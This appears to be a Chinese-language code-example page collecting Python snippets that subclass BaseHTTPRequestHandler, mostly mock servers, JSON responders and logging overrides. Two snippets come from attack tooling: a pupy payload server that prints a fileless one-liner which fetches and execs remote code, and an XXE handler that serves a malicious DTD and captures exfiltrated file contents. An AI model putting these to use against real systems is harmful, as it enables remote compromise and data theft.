我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用BaseHTTPServer.BaseHTTPRequestHandler()。
def handle_get(self): """Handle a single HTTP GET request. Default implementation indicates an error because XML-RPC uses the POST method. """ code = 400 message, explain = \ BaseHTTPServer.BaseHTTPRequestHandler.responses[code] response = BaseHTTPServer.DEFAULT_ERROR_MESSAGE % \ { 'code' : code, 'message' : message, 'explain' : explain } print 'Status: %d %s' % (code, message) print 'Content-Type: %s' % BaseHTTPServer.DEFAULT_ERROR_CONTENT_TYPE print 'Content-Length: %d' % len(response) print sys.stdout.write(response)
def echo_json_response(handler,code,status=None,results=None): """Takes a JSON package and returns it to the user w/ full HTTP headers""" if handler is None or code is None: return False if status is None: status = httplib.responses[code] if results is None: results = {} json_res = {'code': code, 'status': status, 'results' : results} json_response = json.dumps(json_res) if isinstance(handler, BaseHTTPRequestHandler): handler.send_response(code) handler.send_header('Content-Type', 'application/json') handler.end_headers() handler.wfile.write(json_response) return True elif isinstance(handler, tornado.web.RequestHandler): handler.set_status(code) handler.set_header('Content-Type', 'application/json') handler.write(json_response) return True else: return False
def run_fake_ingest(metric_data): class FakeCollectdIngest(BaseHTTPRequestHandler): def do_POST(self): body = self.rfile.read(int(self.headers.getheader('Content-Length'))) metric_data.extend(json.loads(body)) self.send_response(200) self.send_header("Content-Type", "text/ascii") self.send_header("Content-Length", "2") self.end_headers() self.wfile.write("OK") print 'Starting ingest server on port 80' httpd = HTTPServer(('', 80), FakeCollectdIngest) httpd.serve_forever() print 'Ingest server shutting down' # Dumps all of the collected metrics back out as JSON upon request
def setup(self): if isinstance(self.__class__.first_run, collections.Callable): try: with self.__class__.first_run_lock: if isinstance(self.__class__.first_run, collections.Callable): self.first_run() self.__class__.first_run = None except StandardError as e: logging.exception('%s.first_run() return %r', self.__class__, e) self.__class__.setup = BaseHTTPServer.BaseHTTPRequestHandler.setup self.__class__.do_CONNECT = self.__class__.do_METHOD self.__class__.do_GET = self.__class__.do_METHOD self.__class__.do_PUT = self.__class__.do_METHOD self.__class__.do_POST = self.__class__.do_METHOD self.__class__.do_HEAD = self.__class__.do_METHOD self.__class__.do_DELETE = self.__class__.do_METHOD self.__class__.do_OPTIONS = self.__class__.do_METHOD self.__class__.do_PATCH = self.__class__.do_METHOD self.setup()
def handle_one_request(self): if not self.disable_transport_ssl and self.scheme == 'http': leadbyte = self.connection.recv(1, socket.MSG_PEEK) if leadbyte in ('\x80', '\x16'): server_name = '' if leadbyte == '\x16': for _ in xrange(2): leaddata = self.connection.recv(1024, socket.MSG_PEEK) if is_clienthello(leaddata): try: server_name = extract_sni_name(leaddata) finally: break try: certfile = CertUtil.get_cert(server_name or 'www.google.com') ssl_sock = ssl.wrap_socket(self.connection, ssl_version=self.ssl_version, keyfile=certfile, certfile=certfile, server_side=True) except StandardError as e: if e.args[0] not in (errno.ECONNABORTED, errno.ECONNRESET): logging.exception('ssl.wrap_socket(self.connection=%r) failed: %s', self.connection, e) return self.connection = ssl_sock self.rfile = self.connection.makefile('rb', self.bufsize) self.wfile = self.connection.makefile('wb', 0) self.scheme = 'https' return BaseHTTPServer.BaseHTTPRequestHandler.handle_one_request(self)
def combined_handler(path, path_action, file_id, stream_action, path_input=None, path_output=None, stream_input=None, stream_output=None): class _(BaseHTTPRequestHandler): def do_POST(self): request_path = urlparse(self.path).path paths_path = alluxio.client._paths_url_path(path, path_action) streams_path = alluxio.client._streams_url_path( file_id, stream_action) close_path = alluxio.client._streams_url_path(file_id, 'close') if request_path == paths_path: handle_paths_request( self, path, path_action, input=path_input, output=path_output) elif request_path == streams_path: handle_streams_request( self, file_id, stream_action, input=stream_input, output=stream_output) elif request_path == close_path: self.send_response(200) return _
def __init__(self, data): super(HttpServerThread, self).__init__() self.done = False self.hostname = 'localhost' class MockStardog(BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(self): if self.path != '/admin/status': self.send_response(404) return self.send_response(200) self.send_header('Content-type', 'application/json') self.end_headers() self.wfile.write(json.dumps(data)) self.http = BaseHTTPServer.HTTPServer((self.hostname, 0), MockStardog) self.port = self.http.server_port
def run(routes, host = '0.0.0.0', port = 8080): """ Runs a class as a server whose methods have been decorated with @route. """ class RequestHandler(BaseHTTPRequestHandler): def log_message(self, *args, **kwargs): pass def do_GET(self): get(self, routes) server = ThreadedHTTPServer((host, port), RequestHandler) thread = threading.Thread(target = server.serve_forever) thread.daemon = True thread.start() print 'HTTP server started on port 8080' while True: from time import sleep sleep(1) server.shutdown() server.start() server.waitForThread() ################################################################################ # # App
def start_server(*resp): """HTTP server replying with the given responses to the expected requests.""" def url(port, path): return 'http://%s:%s%s' % (socket.gethostname(), port, path) responses = list(reversed(resp)) class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_HEAD(self): response = responses.pop() assert response.path == self.path self.send_response(response.code) for header, value in list(response.headers.items()): self.send_header(header, value) self.end_headers() httpd = SocketServer.TCPServer(("", 0), MyHandler) t = threading.Thread(target=httpd.serve_forever) t.setDaemon(True) t.start() port = httpd.server_address[1] yield functools.partial(url, port) httpd.shutdown()
def do_GET(self): """Implements BaseHTTPRequestHandler.""" # pylint: disable=invalid-name path, parameters, fragment = self.decode_request(self.path) offset = len(path) handler = None while handler is None and offset >= 0: handler = HttpServer.PATH_HANDLERS.get(path[0:offset]) if handler is None: offset = path.rfind('/', 0, offset) if handler is None: self.respond(404, {'Content-Type': 'text/html'}, "Unknown") else: try: handler(self, path, parameters, fragment) except: self.send_error(500, traceback.format_exc()) raise
def __init__(self, ctx, DocumentRoot, *args): self._ctx = ctx self.DocumentRoot = DocumentRoot BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, *args)
def setUp(self): super(TestRequestHandler, self).setUp() client_address = 'localhost' server = '/tmp/server.lock' req = mock.MagicMock() with mock.patch.object(BaseHTTPRequestHandler, '__init__') as m_http: m_http.return_value = None self._req_handler = m_pool.RequestHandler(req, client_address, server) self._req_handler.rfile = mock.Mock() self._req_handler.wfile = mock.Mock()
def makeCustomHandlerClass(dtd_name, dtd_contents, isb64): '''class factory method for injecting custom args into handler class. see here for more info: http://stackoverflow.com/questions/21631799/how-can-i-pass-parameters-to-a-requesthandler''' class xxeHandler(BaseHTTPRequestHandler, object): def __init__(self, *args, **kwargs): self.DTD_NAME = dtd_name self.DTD_CONTENTS = dtd_contents self.ISB64 = isb64 super(xxeHandler, self).__init__(*args, **kwargs) def log_message(self, format, *args): '''overwriting this method to silence stderr output''' return def do_GET(self): if self.path.endswith(self.DTD_NAME): #need to actually serve DTD here mimetype = 'application/xml-dtd' self.send_response(200) self.send_header('Content-type',mimetype) self.end_headers() self.wfile.write(self.DTD_CONTENTS) else: #assume it's file contents and spit it out if self.path[0:2] == '/?': #hacky way to get rid of beginning chars contents = self.path[2:] else: contents = self.path displayContents(contents, self.ISB64) self.send_response(200) self.end_headers() self.wfile.write("") #have to respond w/ something so it doesnt timeout return return xxeHandler #return class
def log_request(self, code='-', size='-'): """Selectively log an accepted request.""" if self.server.logRequests: BaseHTTPServer.BaseHTTPRequestHandler.log_request(self, code, size)
def log_request (self, code='-', size='-'): if code == 200: BaseHTTPServer.BaseHTTPRequestHandler.log_request (self, code, size)
def log_message(self, format, *args): """Log an arbitrary message. This is used by all other logging functions. It overrides ``BaseHTTPRequestHandler.log_message``, which logs to ``sys.stderr``. The first argument, FORMAT, is a format string for the message to be logged. If the format string contains any % escapes requiring parameters, they should be specified as subsequent arguments (it's just like printf!). The client ip is prefixed to every message. """ self.logger.debug("%s - - %s" % (self.address_string(), format % args))
def serve_metric_data(metric_data): class MetricDataSpewer(BaseHTTPRequestHandler): def do_GET(self): data = json.dumps(metric_data) self.send_response(200) self.send_header("Content-Type", "application/json") self.send_header("Content-Length", str(len(data))) self.end_headers() self.rfile.write(data) print 'Starting metric spewer on port 8080' httpd = HTTPServer(('', 8080), MetricDataSpewer) httpd.serve_forever() print 'Metric spewer shutting down'
def date_time_string(self): self.__last_date_time_string = \ BaseHTTPServer.BaseHTTPRequestHandler.\ date_time_string(self) return self.__last_date_time_string
def log_message(self, format, *args): if self.server.log: BaseHTTPServer.BaseHTTPRequestHandler.\ log_message (self, format, *args)
def serve_payload(payload, ip="0.0.0.0", port=8080, link_ip="<your_ip>"): class PupyPayloadHTTPHandler(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header('Content-type','text/html') self.end_headers() # Send the html message self.wfile.write(payload) return try: while True: try: server = HTTPServer((ip, port), PupyPayloadHTTPHandler) break except Exception as e: # [Errno 98] Adress already in use if e[0] == 98: port+=1 else: raise print colorize("[+] ","green")+"copy/paste this one-line loader to deploy pupy without writing on the disk :" print " --- " oneliner=colorize("python -c 'import urllib;exec urllib.urlopen(\"http://%s:%s/index\").read()'"%(link_ip, port), "green") print oneliner print " --- " print colorize("[+] ","green")+'Started http server on %s:%s '%(ip, port) print colorize("[+] ","green")+'waiting for a connection ...' server.serve_forever() except KeyboardInterrupt: print 'KeyboardInterrupt received, shutting down the web server' server.socket.close() exit()
def finish(self): """make python2 BaseHTTPRequestHandler happy""" try: BaseHTTPServer.BaseHTTPRequestHandler.finish(self) except (socket.error, ssl.SSLError, OpenSSL.SSL.Error) as e: if e[0] not in (errno.ECONNABORTED, errno.ECONNRESET, errno.EPIPE): raise
def send_header(self, keyword, value): """Send a MIME header.""" base_send_header = BaseHTTPServer.BaseHTTPRequestHandler.send_header keyword = keyword.title() if keyword == 'Set-Cookie': for cookie in re.split(r', (?=[^ =]+(?:=|$))', value): base_send_header(self, keyword, cookie) elif keyword == 'Content-Disposition' and '"' not in value: value = re.sub(r'filename=([^"\']+)', 'filename="\\1"', value) base_send_header(self, keyword, value) else: base_send_header(self, keyword, value)
def request_handler(addr): class RequestHandler(BaseHTTPRequestHandler): def do_GET(self): if self.path == '/provider.json': body = provider_json % { 'api_uri': addr.api_uri, 'host': addr.host, 'port': addr.port, 'fingerprint': addr.fingerprint } elif self.path == '/ca.crt': cacert = os.path.join(os.path.dirname(__file__), "leaptestscert.pem") with open(cacert, 'r') as f: castr = f.read() body = castr elif self.path == '/1/configs.json': body = configs_json else: body = '{"error": "not implemented"}' self.send_response(200) self.send_header('Content-type', 'applicatino/json') self.send_header('Content-Length', str(len(body))) self.end_headers() self.wfile.write(body) return RequestHandler
def log_message(self, format, *args): if args and isinstance(args[0], (str, unicode)) and (args[0].startswith('GET /_') or args[0].startswith('GET /?')): return return BaseHTTPServer.BaseHTTPRequestHandler.log_message(self, format, *args)
def paths_handler(path, action, params=None, input=None, output=None): class _(BaseHTTPRequestHandler): def do_POST(self): handle_paths_request(self, path, action, params=params, input=input, output=output) return _
def streams_handler(file_id, action, input=None, output=None): class _(BaseHTTPRequestHandler): def do_POST(self): handle_streams_request(self, file_id, action, input=input, output=output) return _
def __init__(self, request, client_address, server): BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, request, client_address, server)